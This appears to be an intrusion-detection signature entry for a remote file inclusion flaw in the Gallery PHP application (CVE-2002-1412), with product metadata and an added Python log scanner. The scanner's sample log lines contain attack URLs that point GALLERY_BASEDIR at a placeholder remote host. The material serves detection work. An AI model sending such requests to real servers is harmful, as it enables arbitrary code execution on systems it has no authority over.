HTTP: PHP Gallery HTTP_VARS In URL

This signature detects attempts to exploit a known vulnerability in Gallery, a Web-based photo management application. Gallery uses the variables HTTP_POST_VARS, HTTP_GET_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to transfer data between pages, including the GALLERY_BASEDIR variable. Attackers can manually control these variables to include a malicious setting for GALLERY_BASEDIR, enabling them to execute arbitrary PHP code on the Gallery server with the permissions of the HTTP server.

Extended Description

Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter.
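
The same condition can be hunted retrospectively in web-server access logs. The following is an added example, not the signature's own logic or code from the original page: the log lines, script name and host name are constructed, and the name normalization assumes PHP's behaviour of converting dots and spaces in request parameter names to underscores.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Names the page lists as attacker-controllable, alone or with PHP array syntax.
SUSPECT = re.compile(
    r"^(?:HTTP_(?:POST|GET|COOKIE)_VARS|HTTP_POST_FILES|GALLERY_BASEDIR)(?:\[|$)")
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def php_name(raw):
    """Decode a parameter name as PHP registers it: dots and spaces in the
    part before any '[' become underscores (assumed PHP behaviour)."""
    base, bracket, rest = unquote_plus(raw).partition("[")
    return re.sub(r"[ .]", "_", base) + bracket + rest

def inspect_request(target):
    """Return (kind, name) findings for one request target (path?query)."""
    findings = []
    for part in urlsplit(target).query.split("&"):
        raw_name, _, raw_value = part.partition("=")
        name = php_name(raw_name)
        if not SUSPECT.match(name):
            continue
        remote = "GALLERY_BASEDIR" in name and REMOTE.match(unquote_plus(raw_value))
        findings.append(("remote-include" if remote else "var-override", name))
    return findings

def scan_log(lines):
    """Scan access-log lines; return (line_number, finding) tuples."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, f) for f in inspect_request(match.group(1)))
    return hits

# Constructed sample lines (documentation addresses, placeholder script name).
SAMPLE = [
    '192.0.2.10 - - [05/Feb/2004:10:00:01 +0000] "GET /gallery/page.php?album=holiday HTTP/1.0" 200 5120',
    '192.0.2.77 - - [05/Feb/2004:10:00:09 +0000] "GET /gallery/page.php?GALLERY_BASEDIR=http://host.example.invalid/ HTTP/1.0" 200 312',
    '192.0.2.77 - - [05/Feb/2004:10:00:12 +0000] "GET /gallery/page.php?HTTP_POST_VARS%5BGALLERY_BASEDIR%5D=http%3A%2F%2Fhost.example.invalid%2F HTTP/1.0" 200 312',
    '192.0.2.77 - - [05/Feb/2004:10:00:15 +0000] "GET /gallery/page.php?album=holiday&GALLERY.BASEDIR=../shared/ HTTP/1.0" 200 312',
]

if __name__ == "__main__":
    for number, (kind, name) in scan_log(SAMPLE):
        print(f"line {number}: {kind} via {name}")
```

Access logs record only the request line, so this covers the URL case named in the signature title; the same variables supplied in a POST body or cookie need inspection at the proxy or IDP layer.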

Affected Products

Bharat_mediratta gallery

Short Name
HTTP:PHP:GALLERY:HTTP-VARS
Severity
Major
Recommended
False
Recommended Action
Drop
Category
HTTP
Keywords
CVE-2002-1412 Gallery HTTP_VARS In PHP URL bid:5375
Release Date
02/05/2004
Supported Platforms

srx-branch-12.3

srx-19.3

srx-branch-19.3

vsrx3bsd-19.2

srx-branch-19.4

vsrx-19.4

mx-12.3

mx-19.4

vmx-19.4

mx-19.3

vsrx3bsd-19.4

srx-19.4

vsrx-12.3

vmx-19.3

vsrx-19.2

srx-12.3

Sigpack Version
3336
False Positive
Unknown
Vendors

Bharat_mediratta

CVSS Score

7.5
